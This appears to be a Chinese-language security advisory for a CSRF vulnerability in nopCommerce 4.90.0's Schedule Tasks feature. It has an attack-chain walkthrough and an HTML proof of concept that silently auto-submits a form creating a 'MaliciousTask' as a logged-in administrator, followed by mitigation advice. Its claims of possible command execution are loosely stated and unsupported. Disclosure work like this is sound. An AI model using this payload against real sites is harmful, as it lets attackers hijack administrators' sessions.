CVE-2025-65593 nopCommerce 4.90.0 Schedule Tasks功能CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-65593

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

nopCommerce

漏洞概述

nopCommerce 4.90.0版本中的Schedule Tasks（计划任务）功能存在跨站请求伪造（CSRF）漏洞。该漏洞允许攻击者通过诱导已登录的管理员用户访问恶意网页，在用户不知情的情况下执行未经授权的操作。由于计划任务功能通常具有较高的系统权限，攻击者可能利用此漏洞执行敏感操作，如修改系统配置、执行数据库操作或触发其他管理功能。攻击成功的关键在于利用了Web应用程序对用户请求的信任机制，当管理员访问包含恶意请求的页面时，浏览器会自动携带有效的会话Cookie向目标站点发送请求，从而绕过身份验证机制。此漏洞的CVSS评分为8.8，属于高危级别，对系统安全性构成严重威胁。

技术细节

CSRF漏洞的核心在于Web应用程序未能正确验证请求的来源和有效性。在nopCommerce 4.90.0的计划任务功能中，系统未能实现足够的CSRF防护机制。具体来说，当管理员在已认证的会话中访问计划任务管理页面时，系统未能验证请求是否来自合法的用户操作，而是直接执行了请求中的操作。攻击者可以构造一个恶意HTML页面，包含自动提交的表单，该表单指向nopCommerce的计划任务功能端点。当已登录的管理员访问该恶意页面时，浏览器会自动发送带有有效会话Cookie的POST请求。攻击者可以借此执行添加、修改或删除计划任务的操作，甚至可能通过计划任务执行系统命令。防御此类漏洞的标准做法是在关键操作中引入CSRF Token验证，确保请求确实来自应用程序自身的表单，而非第三方恶意网站。

攻击链分析

STEP 1

步骤1

攻击者创建恶意网页，包含自动提交的表单，该表单指向nopCommerce的计划任务管理端点

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或其他方式诱导已登录的nopCommerce管理员访问恶意网页

STEP 3

步骤3

管理员浏览器自动向nopCommerce服务器发送POST请求，包含有效的会话Cookie

STEP 4

步骤4

由于服务器未正确验证CSRF Token或请求来源，恶意请求被成功执行

STEP 5

步骤5

攻击者通过修改的计划任务执行恶意操作，如系统命令执行或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for nopCommerce 4.90.0 Schedule Tasks -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC</title>
</head>
<body>
    <h1>Scheduled Task CSRF PoC</h1>
    <p>This PoC demonstrates the CSRF vulnerability in nopCommerce Schedule Tasks.</p>
    
    <!-- Auto-submit form targeting Schedule Tasks endpoint -->
    <form id="csrfForm" action="https://target-site.com/Admin/ScheduleTask" method="POST" style="display:none;">
        <!-- Anti-forgery token (if not validated properly) -->
        <input type="hidden" name="__RequestVerificationToken" value="attacker-controlled-or-empty" />
        
        <!-- Malicious task parameters -->
        <input type="hidden" name="Name" value="MaliciousTask" />
        <input type="hidden" name="CronExpression" value="* * * * *" />
        <input type="hidden" name="Enabled" value="true" />
        <input type="hidden" name="SelectedTaskType" value="SystemTaskType" />
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.addEventListener('DOMContentLoaded', function() {
            document.getElementById('csrfForm').submit();
        });
    </script>
    
    <p>If you see this message, the form has been submitted.</p>
</body>
</html>

影响范围

nopCommerce 4.90.0

防御指南

临时缓解措施

作为临时缓解措施，可以在浏览器端安装CSRF防护插件，同时确保管理员不要点击不明链接。对于服务器端，可以在反向代理层配置额外的请求来源验证，限制只有特定IP地址或域名可以访问管理接口。最根本的解决方案是等待官方发布安全更新并及时应用补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65593
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65593
3 Details https://www.cvedetails.com/cve/CVE-2025-65593/
4 VulDB https://vuldb.com/cve/CVE-2025-65593
5 Link https://seclists.org/fulldisclosure/2025/Dec/20
6 Link https://www.nopcommerce.com/
7 Link http://seclists.org/fulldisclosure/2025/Dec/20